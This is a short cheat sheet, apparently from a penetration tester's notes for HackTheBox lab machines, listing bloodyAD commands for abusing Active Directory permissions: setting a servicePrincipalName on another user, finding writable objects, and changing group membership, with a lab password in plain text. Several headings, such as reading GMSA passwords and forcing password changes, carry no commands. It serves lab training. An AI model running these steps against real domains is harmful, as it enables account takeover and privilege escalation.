BloodyAD

  • for WriteSPN

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated
  • To get the writable object

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail

OR

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable

OR

bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'Mirage-Service$' -k get writable 
  • to add/remove to the group

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure


└─$ bloodyAD -d $DOMAIN --host $TARGET --dc-ip $IP -u #USER -p $PASS remove groupMember "Protected Objects" "IT"[-] IT removed from Protected Objects
  • to read GMSA Managed Password

  • ForceChangePassword

  • Change the owner

  • Give GenericAll rights to the user

  • To check if the user account(UAC) is disabled or not

  • to remove the UAC

  • set SPN

Last updated